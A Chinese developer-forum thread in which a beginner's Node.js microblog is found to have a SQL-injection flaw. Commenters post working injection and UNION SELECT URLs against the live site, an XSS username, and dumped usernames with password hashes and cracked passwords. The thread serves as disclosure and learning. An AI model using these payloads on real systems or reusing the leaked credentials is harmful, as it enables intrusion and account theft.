这是一个创建于 3477 天前的主题,其中的信息可能已经有所发展或是发生改变。
 | 1 ruolis 2016-05-24 19:15:42 +08:00 看起来挺好的 也打算学学 |
 | 2 newbie269 2016-05-24 19:25:58 +08:00 via iPhone 你的 node.js 怎么学习的呀?? |
 | 3 a2ex 2016-05-24 19:31:27 +08:00 http 服务器消息处理+数据库读写。。。 |
 | 4 lizhiqing1996 OP @willhunger 我看的《 nodejs 开发指南》,这个微博例子就是上面的,不过我换了很多内容 |
| 5 liziqing1996 OP @a2ex 初学只能做到这样了。。。 |
 | 6 Dvel 2016-05-24 19:47:45 +08:00 学了多久了,我过阵子也打算学学 node.js |
 | 7 zonghua 2016-05-24 19:50:17 +08:00 没什么好学的。。。 |
| 8 lizhiqing1996 OP  1 |
 | 9 freewheel 2016-05-25 01:20:12 +08:00 via iPhone maek |
 | 10 O3YwA1ENkb7i35XJ 2016-05-25 09:05:39 +08:00 1 赤果果的 sql 注入... https://github.com/Zhiqing-Lee/microblog/blob/master/models/post.js 第 32 行,自己手工将当前的用户名拼入 Sql 语句中. 整个项目中,其他地方都是用的 ? 来带入的(这时候会自动处理, 不会有注入的情况, 只有这里自己手工带进去了). 然后我注册了一个名为 `" or ""="` 的用户, 然后...你懂的, 自己看结果 我注册的账号的列表页: http://mb.zhiqing.info/u/%22%20or%20%22%22=%22 其他普通帐号的: http://mb.zhiqing.info/u/qwe |
| 12 O3YwA1ENkb7i35XJ 2016-05-25 09:56:34 +08:00 1 再来个炸弹: http://mb.zhiqing.info/u/%22%20union%20ALL%20select%20name%20as%20user,password%20as%20post,%200%20as%20time%20from%20users%20where%20%22%22=%22 根据查出来的结果, 以及根据代码中密码的写入方式得知是 MD5 + base64 的结果,所以... 以下为目前列出来的账号的密码: zhiqing f57b888bc53ccfa3e4a71f19604df23c 找到了,但是是一条付费才能看的. qwe 76d80224611fc919a5d54f0ff9fba446 qwe 123 202cb962ac59075b964b07152d234b70 123 <h1>123</h1> 5e6535e26cf8c546395f4e3f4c5d189e 未找到 123qwe 46f94c8de14fb36680850768ff1b7f2a 123qwe 3123 e10adc3949ba59abbe56e057f20f883e 123456 <img src=x> eb6cd2e33d39e677b19b611fe2eb32ee 未找到 jerry 202cb962ac59075b964b07152d234b70 123 foo 37b51d194a7513e45b56f6524f2d51f2 bar " or ""=" e10adc3949ba59abbe56e057f20f883e 123456 tet111 4297f44b13955235245b2497399d7a93 123123 |
| 13 O3YwA1ENkb7i35XJ 2016-05-25 09:57:08 +08:00 @qinxi 这不是猜, 这是根据他的代码得出来的结论以及事实. |
 | 14 cappuccinos 2016-05-25 10:03:55 +08:00 好样的 1! |
| 15 O3YwA1ENkb7i35XJ 2016-05-25 10:09:06 +08:00 zhiqing 的那个密码也查出来了 密码为: lizhiqing |
 | 16 garipan 2016-05-25 10:11:18 +08:00 你们太坏了 真的 |
| 17 lizhiqing1996 OP @xqin 学习了,终于意识到自己的代码是多么不安全了 |
 | 18 hard2reg 2016-05-25 11:07:01 +08:00 你们这群人,太可怕了 |
 | 20 jame 2016-05-25 12:33:22 +08:00 帐号可以带空格, 带标签 注册了一个<script>alert(1);</script> |
 | 21 Fontaine 2016-05-25 13:46:37 +08:00 还是 php 好啊 |
 | 23 qfdk PRO 来来来我来围观,正好有个项目,下午去检测下 |
| 24 lizhiqing1996 OP |
| 25 lizhiqing1996 OP 1 @xqin 我操作数据库老是出问题,只好增加了用户名限制,能解决这个问题吗? |
 | 26 MiguelValentine 2016-05-25 18:37:51 +08:00 @lizhiqing1996 pool.escape()或者 connection.escape() 处理一遍参数 |
 | 27 yang2yang 2016-05-25 20:46:22 +08:00 看到那个 sql 注入,才知道原来 sql 注入是这样操作的....又学到一手 |
Select Language